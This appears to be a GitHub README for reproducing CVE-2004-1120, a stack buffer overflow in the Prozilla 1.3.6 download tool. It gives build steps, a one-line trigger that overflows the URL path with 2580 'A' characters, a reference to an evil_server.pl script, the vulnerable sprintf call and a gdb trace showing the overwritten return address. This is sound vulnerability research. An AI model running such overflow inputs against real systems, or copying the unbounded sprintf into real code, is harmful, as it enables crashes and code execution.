Skip to content

Latest commit

 

History

History

CVE-2004-1120

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 
evil_server.pl
evil_server.pl
 
 

README.md

CVE-2004-1120

Experiment Environment

Ubuntu 14.04 LTS

Ubuntu 11.04

INSTALL & Configuration

wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1120/prozilla-1.3.6.tar.gz

tar -xvf prozilla-1.3.6.tar.gz
cd prozilla-1.3.6

./configure
make

Problems in Installation & Configuration

How to trigger vulnerability

Method1:

prozilla-1.3.6/src/proz http://www.google.com/`perl -e 'print "A"x2580'`

Method2:

perl evil_server.pl
prozilla-1.3.6/src/proz http://localhost:8080/abc

PoCs

Prozilla 1.3.6 - Remote Stack Overflow

www-client/prozilla: multiple vulnerabilitie

Vulnerability Details & Patch

Root Cause

http.c:378

	sprintf(buffer,
            "HEAD %s HTTP/1.0\r\nUser-Agent: %s%s\r\nHost: %s\r\nAccept: */*\r\n%s%s\r\n",
            u->path, PACKAGE_NAME, VERSION, u->host,
            referer ? referer : "",
            wwwauth ? wwwauth : "");

Stack Trace

(gdb) info stack
#0  0x0805412e in ?? ()
#1  0x083af3fb in ?? ()
#2  0x080540d7 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0xbfe44534 in ?? ()
#7  0x41414141 in ?? ()
#8  0x41414141 in ?? ()
#9  0x41414141 in ?? ()

References